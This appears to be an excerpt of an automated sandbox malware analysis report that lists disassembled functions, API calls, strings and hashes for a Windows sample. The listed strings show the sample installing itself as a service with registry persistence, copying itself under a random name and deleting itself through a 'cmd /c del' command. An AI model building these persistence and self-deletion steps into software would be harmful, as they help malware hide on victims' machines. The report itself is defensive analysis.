Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-3283962145
Opcode ID: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
Opcode Fuzzy Hash: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98

Function 00404CCB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404D01
CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D6F

Part of subcall function 00403DDB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404CD9

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9

Function 004024BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
WriteFile.KERNEL32(00000000,?,open C:\Windows\temp\Edit9,00000000,?,?,00000000,00000011), ref: 004024FB

Strings

open C:\Windows\temp\Edit9, xrefs: 004024CA, 004024EF

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: FileWritelstrlen
String ID: open C:\Windows\temp\Edit9
API String ID: 427699356-1012079565
Opcode ID: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
Opcode Fuzzy Hash: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D

Function 00403491 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
GlobalFree.KERNEL32(?), ref: 004034B2

Strings

"C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 004034A3

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"
API String ID: 1100898210-3663855964
Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8

Function 00405517 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040551D
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040552B

Strings

C:\Users\user\Desktop, xrefs: 00405517

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD

Function 00405629 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405649
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF

Analysis Process: v5.exePID: 7460, Parent PID: 7380COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.8%
Total number of Nodes:	609
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040597D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00405992

Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
Part of subcall function 004059F4: 6D0C6DE0.KERNEL32(00000000), ref: 00405A10
Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
Part of subcall function 004059F4: RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6

StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
ExitProcess.KERNEL32 ref: 004059EE

Strings

Defghi Klmnopqr Tuv, xrefs: 004059AC, 004059D1
Defghijk Mnopqrstu Wxyabcd Fghijklm Opq, xrefs: 004059C7
Defghi Klmnopqr Tuvwxyab Defg, xrefs: 004059CC

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: CtrlDispatcherExitLibraryLoadOpenProcessServiceStartStartup_mbscat_mbscpy
String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
API String ID: 2992414417-1370363722
Opcode ID: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
Opcode Fuzzy Hash: 83e1352e72bf4f9bd4512c402b146e2ee333a0580aff940d61e14a20f462f08e
Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E

Function 00405B10 Relevance: 100.1, APIs: 39, Strings: 18, Instructions: 346
librarystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
6D0C6DE0.KERNEL32(00000000), ref: 00405B50
LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
6D0C6DE0.KERNEL32(00000000), ref: 00405B61
LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
6D0C6DE0.KERNEL32(00000000), ref: 00405B72
LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
6D0C6DE0.KERNEL32(00000000), ref: 00405B83
LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
6D0C6DE0.KERNEL32(00000000), ref: 00405B98
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
6D0C6DE0.KERNEL32(00000000), ref: 00405BA9
LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
6D0C6DE0.KERNEL32(00000000), ref: 00405BBA
LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
6D0C6DE0.KERNEL32(00000000), ref: 00405BCB
LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
6D0C6DE0.KERNEL32(00000000), ref: 00405BDC
LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
6D0C6DE0.KERNEL32(00000000), ref: 00405BED
LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
6D0C6DE0.KERNEL32(00000000), ref: 00405BFE
LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
6D0C6DE0.KERNEL32(00000000), ref: 00405C0C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
strlen.MSVCRT ref: 00405C3F
strncmp.MSVCRT ref: 00405C53
wsprintfA.USER32 ref: 00405CB5
_mbscat.MSVCRT ref: 00405CC7
_mbscat.MSVCRT ref: 00405CDA
memset.MSVCRT ref: 00405D00
_mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00405D45
GetLastError.KERNEL32 ref: 00405E3E

Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
Part of subcall function 00406BD0: 6D0C6DE0.KERNEL32(00000000), ref: 00406BE2

_mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
_mbscat.MSVCRT ref: 00405F9D
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00405FB8
lstrlen.KERNEL32(004059DB), ref: 00406014

Part of subcall function 0040604D: CloseServiceHandle.ADVAPI32(?,0040603C), ref: 0040605B
Part of subcall function 0040604D: RegCloseKey.KERNEL32(?,0040603C), ref: 00406083

Strings

CopyFileA, xrefs: 00405B8B
SYSTEM\CurrentControlSet\Services\, xrefs: 00405F80, 00405F86
RegCloseKey, xrefs: 00405B36
KERNEL32.dll, xrefs: 00405B90
LockServiceDatabase, xrefs: 00405C03
RegOpenKeyA, xrefs: 00405BC2
CloseServiceHandle, xrefs: 00405B7A
UnlockServiceDatabase, xrefs: 00405BD3
OpenSCManagerA, xrefs: 00405B58
Description, xrefs: 00406020, 00406026
StartServiceA, xrefs: 00405BB1
CreateServiceA, xrefs: 00405BF5
RegSetValueExA, xrefs: 00405BA0
ChangeServiceConfig2A, xrefs: 00405BE4
ADVAPI32.dll, xrefs: 00405B3B, 00405B40, 00405B5D, 00405B6E, 00405B7F, 00405BA5, 00405BB6, 00405BC7, 00405BD8, 00405BE9, 00405BFA, 00405C08
OpenServiceA, xrefs: 00405B69
Defghijk Mnopqrstu Wxyabcd Fghijklm Opq, xrefs: 00405D91, 00405DA1
%c%c%c%c%c%c.exe, xrefs: 00405CA9

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoad$_mbscat$CloseOpen_mbscpy$DirectoryErrorFileHandleLastManagerModuleNameServiceWindowslstrlenmemsetstrlenstrncmpwsprintf
String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
API String ID: 1957042094-766656692
Opcode ID: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
Instruction ID: cb804ed11c5d1b7d2f4ad966b6bff0d4186705c14a699b97b59b11ec4e5a602e
Opcode Fuzzy Hash: 4b3913a236ff868ac2d24959da058726aa9527939866c3b61e1db7a2032d7c53
Instruction Fuzzy Hash: BCE168B1C0426CABDB229B65CC49BDEBEBCAF15744F0440EAE10CB6191C7B95B848F65

Function 004059F4 Relevance: 75.3, APIs: 5, Strings: 38, Instructions: 84
registrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
6D0C6DE0.KERNEL32(00000000), ref: 00405A10
_mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
_mbscat.MSVCRT ref: 00405AD7
RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,?), ref: 00405AF6

Strings

r, xrefs: 00405A62
RegCloseKey, xrefs: 004059FF
Defghi Klmnopqr Tuv, xrefs: 00405AD1
M, xrefs: 00405A52
o, xrefs: 00405A8A
r, xrefs: 00405AAA
c, xrefs: 00405AB6
r, xrefs: 00405A86
o, xrefs: 00405A7A
Y, xrefs: 00405A3A
\, xrefs: 00405A9E
l, xrefs: 00405A8E
e, xrefs: 00405ABA
S, xrefs: 00405A32
e, xrefs: 00405A96
e, xrefs: 00405AA6
E, xrefs: 00405A4E
v, xrefs: 00405AAE
\, xrefs: 00405AC2
SYSTEM\CurrentControlSet\Services\, xrefs: 00405A37
u, xrefs: 00405A5E
S, xrefs: 00405A46
\, xrefs: 00405A56
S, xrefs: 00405A92
t, xrefs: 00405A82
S, xrefs: 00405AA2
i, xrefs: 00405AB2
t, xrefs: 00405A9A
e, xrefs: 00405A6A
n, xrefs: 00405A6E
ADVAPI32.dll, xrefs: 00405A04
s, xrefs: 00405ABE
n, xrefs: 00405A7E
C, xrefs: 00405A76
C, xrefs: 00405A5A
r, xrefs: 00405A66
T, xrefs: 00405A4A
t, xrefs: 00405A72

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoadOpen_mbscat_mbscpy
String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
API String ID: 3494547092-1712674794
Opcode ID: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
Opcode Fuzzy Hash: 144e551ac243e5fd7547a2f692bcd48759d7fa28a844e17c41491cb02200368e
Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6

Function 0040355B Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 117
threadlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00403571
6D0C6DE0.KERNEL32(00000000), ref: 00403578
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
ShellExecuteEx.SHELL32(0000003C), ref: 00403675
SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
GetCurrentProcess.KERNEL32(00000100), ref: 00403690
SetPriorityClass.KERNEL32(00000000), ref: 00403697
GetCurrentThread.KERNEL32 ref: 0040369B
SetThreadPriority.KERNEL32(00000000), ref: 004036A2
SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4

Strings

COMSPEC, xrefs: 004035F6
<, xrefs: 00403647
p, xrefs: 00403655
O, xrefs: 00403651
> nul, xrefs: 00403627
/c del , xrefs: 00403607
lstrcatA, xrefs: 00403567
KERNEL32.dll, xrefs: 0040356C
n, xrefs: 0040365D
e, xrefs: 00403659

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Priority$ClassCurrentNameThread$ChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcessShellShortVariable
String ID: > nul$/c del $<$COMSPEC$KERNEL32.dll$O$e$lstrcatA$n$p
API String ID: 3031387768-2260071220
Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64

Function 00406A48 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00406A75
__p__fmode.MSVCRT ref: 00406A8A
__p__commode.MSVCRT ref: 00406A98
__setusermatherr.MSVCRT ref: 00406AC4
_initterm.MSVCRT ref: 00406ADA
__getmainargs.MSVCRT ref: 00406AFD
_initterm.MSVCRT ref: 00406B0D
GetStartupInfoA.KERNEL32(?), ref: 00406B4C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00406B70
exit.KERNELBASE ref: 00406B80
_XcptFilter.MSVCRT ref: 00406B92

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18

Function 0040604D Relevance: 3.0, APIs: 2, Instructions: 14
registryserviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseServiceHandle.ADVAPI32(?,0040603C), ref: 0040605B
RegCloseKey.KERNEL32(?,0040603C), ref: 00406083

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
